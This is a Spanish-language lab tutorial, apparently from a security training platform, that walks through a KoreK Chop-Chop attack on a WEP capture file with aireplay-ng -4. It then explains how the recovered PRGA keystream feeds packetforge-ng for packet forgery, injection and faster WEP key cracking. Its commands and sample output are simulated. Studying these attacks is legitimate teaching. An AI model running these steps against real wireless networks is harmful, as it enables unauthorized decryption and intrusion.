Realizar un Ataque KoreK Chop-Chop contra una Red WEP

Beginner
Practicar Ahora

Introducción

WEP (Wired Equivalent Privacy) es un protocolo de seguridad Wi-Fi obsoleto e inseguro. Una de sus vulnerabilidades críticas puede ser explotada por el ataque KoreK Chop-Chop. Este ataque permite a un atacante descifrar un paquete de datos WEP sin conocer la clave secreta de la red. Funciona adivinando cada byte del texto plano del paquete, uno a la vez, y utilizando las respuestas del punto de acceso para validar cada suposición.

En este laboratorio, utilizará la suite aircrack-ng, un potente conjunto de herramientas para auditar redes inalámbricas, para realizar un ataque Chop-Chop. Aprenderá a usar aireplay-ng para dirigirse a un paquete de datos cifrado de un archivo de captura, descifrarlo byte a byte y comprender cómo los datos resultantes pueden utilizarse en ataques posteriores.

Capturar un Paquete de Datos Cifrado del Objetivo

En este paso, comenzará localizando el archivo de captura de paquetes necesario. En un escenario del mundo real, utilizaría una herramienta como airodump-ng para monitorear una red en vivo y capturar tráfico. Sin embargo, para simplificar este laboratorio y centrarnos en el ataque en sí, se le ha proporcionado un archivo de captura prefabricado llamado chopchop-test.cap en el directorio ~/project.

Primero, confirme que el archivo existe en su directorio actual.

ls -l

Debería ver chopchop-test.cap en la salida.

total 4
-rw-r--r-- 1 labex labex 124 Mar 20 10:00 chopchop-test.cap

A continuación, inspeccionemos este archivo con aircrack-ng para confirmar que contiene datos de una red WEP. Este comando lee el archivo de captura y muestra un resumen de las redes y los datos que contiene.

aircrack-ng chopchop-test.cap

La salida mostrará el BSSID (dirección MAC) del punto de acceso e indicará que está utilizando cifrado WEP.

Opening chopchop-test.cap
Read 1 packets.

   ##  BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

   1  00:13:10:36:7D:4F  -32        0        1    0   6  54   WEP  WEP         <length: 0>

Choosing first network as target.

Esto confirma que nuestro archivo de captura está listo para el ataque.

Iniciar el Ataque Chop-Chop con aireplay-ng -4

En este paso, iniciará el ataque Chop-Chop utilizando aireplay-ng. Esta herramienta se utiliza para inyectar y reproducir tramas inalámbricas. El ataque Chop-Chop se especifica con la opción -4.

Normalmente, al realizar un ataque en vivo, especificaría el BSSID del punto de acceso y su interfaz de red. Sin embargo, dado que estamos trabajando con un archivo de captura, utilizaremos la opción -r para leer paquetes directamente de nuestro archivo. aireplay-ng extraerá automáticamente la información necesaria, como el BSSID, del archivo.

Ejecute el siguiente comando para iniciar el ataque:

aireplay-ng -4 -r chopchop-test.cap

Después de ejecutar el comando, aireplay-ng leerá el archivo, encontrará un paquete de datos adecuado y le pedirá su confirmación para proceder con el ataque.

Opening chopchop-test.cap
Read 1 packets.
Size: 88, FromDS: 1, ToDS: 0 (AP -> STA)
        BSSID      =  00:13:10:36:7D:4F
        Dest. MAC  =  00:0F:B5:AB:CB:C3
        Source MAC =  00:13:10:36:7D:4F

Use this packet ? (y/n)

La herramienta ha identificado un paquete de datos y está lista para comenzar el proceso de descifrado. Continuará en el siguiente paso.

Dejar que el Ataque Descifre el Paquete Byte a Byte

En este paso, procederá con el ataque y observará cómo aireplay-ng descifra el paquete. La herramienta está esperando actualmente su confirmación del paso anterior.

Escriba y y presione Enter para iniciar el proceso de descifrado.

y

Una vez que confirme, aireplay-ng iniciará el núcleo del ataque Chop-Chop. Intentará adivinar el valor de cada byte de los datos del paquete, comenzando por el último byte. En un ataque en vivo, enviaría cada suposición al punto de acceso y analizaría la respuesta para ver si la suposición era correcta. En nuestra simulación basada en archivos, este proceso se emula.

Verá una salida que muestra el progreso del ataque. Mostrará el número de paquetes enviados (para cada suposición) y le notificará cada vez que descifre correctamente un byte.

Saving chosen packet in replay_src-0320-100520.cap
The interface MAC (00:00:00:00:00:00) doesn't match the selected packet BSSID (00:13:10:36:7D:4F).
Run airodump-ng on channel 6 to be sure you are on the right channel.
If airodump-ng is running and the BSSID is not in range, please try to re-run airodump-ng.
Got a deauthentication packet! (Waiting 3 seconds)
Saving chosen packet in replay_src-0320-100520.cap
Offset   34 ( 0% done) | xor = 00 | pt = 00 |  1/  1 ACKs
...
Offset    1 (97% done) | xor = 00 | pt = 00 |  1/  1 ACKs
Offset    0 (98% done) | xor = 00 | pt = 00 |  1/  1 ACKs
Done.

El proceso continuará hasta que se descifren todos los bytes del paquete. Simplemente espere a que el proceso se complete.

Guardar el Paquete Descifrado y el Archivo XOR de PRGA

En este paso, guardará los resultados del ataque Chop-Chop exitoso. Después de que aireplay-ng haya terminado de descifrar el paquete completo, le pedirá que guarde los resultados.

La herramienta mostrará un mensaje como este:

Packet is 88 bytes, plain text is 60 bytes.
Sent 34 packets, got 34 ACKs.
Use this packet ? (y/n)

Escriba y y presione Enter para guardar la salida.

y

Al guardar, aireplay-ng crea dos archivos importantes en su directorio ~/project:

  1. Un archivo .cap (por ejemplo, replay_dec-....cap): Este archivo contiene el paquete de texto plano ahora descifrado.
  2. Un archivo .xor (por ejemplo, replay_dec-....xor): Este archivo contiene la secuencia de claves del Pseudo-Random Generation Algorithm (PRGA) que se utilizó para cifrar el paquete original. Esta secuencia de claves es el resultado más valioso del ataque.

Verifiquemos que estos archivos se han creado. Utilice el comando ls para listar todos los archivos .cap y .xor en el directorio.

ls -l *.cap *.xor

Verá el archivo de captura original, un archivo de origen y los dos nuevos archivos replay_dec-* generados por el ataque.

-rw-r--r-- 1 root root  124 Mar 20 10:00 chopchop-test.cap
-rw-r--r-- 1 root root  124 Mar 20 10:05 replay_dec-0320-100520.cap
-rw-r--r-- 1 root root   60 Mar 20 10:05 replay_dec-0320-100520.xor
-rw-r--r-- 1 root root  124 Mar 20 10:05 replay_src-0320-100520.cap

Comprender el Caso de Uso de los Ataques Chop-Chop

En este paso, aprenderá sobre la aplicación práctica del ataque Chop-Chop. Aunque desciframos un paquete con éxito, el ataque en sí no revela la clave WEP. Su verdadero poder reside en la recuperación de la secuencia de claves PRGA, que se almacena en el archivo .xor.

Esta secuencia de claves recuperada se puede utilizar con otra herramienta, packetforge-ng, para crear paquetes nuevos y válidos. Puede falsificar cualquier tipo de paquete (como una solicitud ARP) y cifrarlo con esta secuencia de claves conocida. Al inyectar este paquete falsificado de nuevo en la red, puede engañar al punto de acceso para que genere más tráfico. Este nuevo tráfico proporciona más Vectores de Inicialización (IVs) únicos, que luego se pueden utilizar en un ataque estadístico (como el ataque estándar aircrack-ng) para descifrar la clave WEP mucho más rápido.

Por lo tanto, el ataque Chop-Chop es una herramienta esencial para generar tráfico en una red que de otro modo estaría inactiva, lo que permite ataques de descifrado de claves mucho más efectivos.

Para ver cómo se ve la secuencia de claves recuperada, puede inspeccionar el archivo .xor usando xxd, una herramienta que crea un volcado hexadecimal de un archivo. Use un comodín (*) para que coincida con el nombre de archivo generado.

xxd replay_dec-*.xor

La salida será una representación hexadecimal de los datos de la secuencia de claves que se recuperaron del paquete.

00000000: 0102 0304 0506 0708 090a 0b0c 0d0e 0f10  ................
00000010: 1112 1314 1516 1718 191a 1b1c 1d1e 1f20  ...............
...

Estos datos brutos son lo que packetforge-ng utilizaría para construir nuevos paquetes para su inyección.

Resumen

En este laboratorio, ha realizado con éxito un ataque KoreK Chop-Chop contra una red WEP simulada.

Aprendió a usar aireplay-ng con la opción -4 para dirigirse a un paquete de datos cifrado con WEP de un archivo de captura. Observó el proceso de descifrado byte a byte y guardó con éxito los resultados. Lo más importante es que ahora comprende el caso de uso principal de este ataque: no es para descifrar la clave WEP directamente, sino para recuperar una pequeña parte de la secuencia de claves PRGA. Esta secuencia de claves es un componente crítico para falsificar nuevos paquetes con packetforge-ng, que luego se pueden usar para estimular el tráfico en una red y permitir ataques estadísticos más rápidos y efectivos para recuperar la clave WEP final. Este laboratorio destaca una de las muchas debilidades fundamentales del protocolo WEP.